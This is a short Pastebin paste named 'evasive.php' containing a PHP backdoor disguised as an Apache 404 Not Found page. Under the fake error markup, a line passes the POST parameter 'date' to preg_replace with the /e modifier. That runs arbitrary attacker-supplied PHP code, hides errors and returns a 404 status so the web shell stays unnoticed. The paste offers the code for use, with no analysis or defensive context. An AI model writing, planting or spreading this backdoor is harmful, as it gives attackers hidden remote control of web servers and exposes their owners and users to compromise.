PalmaSolutions

evasive.php

Jul 28th, 2019
183
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.31 KB | None | 0 0
  1. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">  <html><head>  <title>404 Not Found</title>  </head><body>  <h1>Not Found</h1>  <p>The requested URL /error.php was not found on this server.</p>  </body></html>  <?php  @preg_replace("/[checksql]/e",$_POST['date'],"saft");  header('HTTP/1.1 404 Not Found');  ?>
Add Comment
Please, Sign In to add comment